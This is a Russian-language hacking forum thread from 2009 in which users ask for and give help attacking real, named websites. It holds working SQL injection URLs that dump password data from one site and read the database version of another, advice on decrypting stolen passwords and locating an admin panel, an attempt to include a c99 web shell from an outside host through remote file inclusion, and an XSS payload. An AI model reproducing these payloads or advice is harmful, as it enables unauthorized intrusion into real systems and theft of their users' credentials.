Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Выяснил, что 19 колонок, а пишешь 20, посчитай...
     
    1 person likes this.
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Давай ссылку в пм.
     
  3. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    да это я так.. случайно... просто перебирал может больше может и меньше ну знаешь иногда такое бывает ну так и скопировал наверно!... так то сначала 19 пробовал!
     
  4. hack001

    hack001 New Member

    Joined:
    17 Jun 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    подскажите пож. вот сайт я его ломанул вот только 2 вопроса что с пасами они неправельно выглядят , и 2 есть ли там мыло админа и как узнать его ник ? а да вот сайт http://tass-ural.ru/news/?id=-47468+union+select+1,pass,3,4,5,6,7,8,9,10,11,12,13,14+FROM+subscribe--
     
  5. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    там же есть колонка email
    Это подписчики ))
     
  6. hack001

    hack001 New Member

    Joined:
    17 Jun 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    ну почему так пас отабражён ? и есть ли там пас админа ?
     
  7. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    может зашифрован, может кодировка не та, и пасс админа найдешь там врядли
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    :)
    1. C пассами всё нормально, они зашифрованы. Думаю, что это aes_encrypt обычный, хотя может и самопис какой

    2. Врятли пароль в базе, скорее всего он в хтпассворд каком-нибудь
    http://tass-ural.ru/admin/
     
  9. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    скажите где взять большие словари названий таблиц и колонок для сипта. ОООЧЕНЬ БОЛЬШИЕ.
     
  10. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    Прилагаются к сипт
    + очень часто попадаются переводы этих слов на другие языки. Можно сгенерить хорошую базу.
     
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    [​IMG]
     
  12. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    ну вы че за ламера меня совсем держите)? Знаю я про стандартный словарик. Он маленький и нашел ток одну табличку) и 0 полей в ней. Язык англ нада - без префиксов.
     
  13. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    Там есть в комплекте словарь побольше :)
     
  14. OSW

    OSW Elder - Старейшина

    Joined:
    12 Jul 2007
    Messages:
    325
    Likes Received:
    56
    Reputations:
    7
    Вопрос: http://www.shu.ru/index.php?id=27;select+version()::int--
    Подбор колонок никак не получается. Ни нуллом, ни числом, ни ордером. Хелп.
     
  15. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    http://www.shu.ru/index.php?id=27/**/UNION/**/SELECT/**/null,null,CAST(version()/**/AS/**/text),null,null,null--
     
    2 people like this.
  16. OSW

    OSW Elder - Старейшина

    Joined:
    12 Jul 2007
    Messages:
    325
    Likes Received:
    56
    Reputations:
    7
    сенкс
     
  17. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Почему не удается шелл подключить =(
    http://www.npithub.com/index.php?fname=http://wowbkdo.narod.ru/c99madshell.php
    Хотя так сайт внутри открывается =(
    http://www.npithub.com/index.php?fname=http://wowbkdo.narod.ru/
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Это фрейм, а не инклюд.
     
    1 person likes this.
  19. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    вопрос по XSS
    вот сцыль на регистрацию на неком ресурсе
    если в поле никнейма написать некторый js код, к примеру
    и нажать на зарегиться то, данный js код сработает, но рега конечно непройдет (не в этом суть)
    Получаеться вроде как пассивная XSS, либо в силу своего незнания либо в силу нестандартности разработчик, вобщем я так и непонял как перадть параметр никнейм через адресную строку. Из кода ясно что переменная не передаеться не как POST не как GET, и ваще его не скрипт обрабатывает а проста HTML.
    И что получаеться это и вовсе не уязвимость ?
    ---------------------------
    прошу неспалить это на их сайте массовой попыткой реги таких ников ))
     
  20. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    после того как пытаешся зарег-тся под ником
    "><script>alert("xss")</script>
    скрипт проверяет его длину (от 4 до 20 символов).
    если его длина не входит в рамки ограничений то выводит к примеру
    ник $_POST['nick'](ему передано значение "><script>alert("xss")</script> и по этому вылазит окно.Там не стоит
    htmlspecialchars()) имеет длину больше 20 символов.
    >>Из кода ясно что переменная не передаеться не как POST не как GET
    данные передаються методом POST
    HTML:
    <form method="POST"
    >>И что получаеться это и вовсе не уязвимость ?
    уязвимость но с нее в данном случае толку 0
     
    #8160 L I G A, 25 Jul 2009
    Last edited: 25 Jul 2009
    2 people like this.
Thread Status:
Not open for further replies.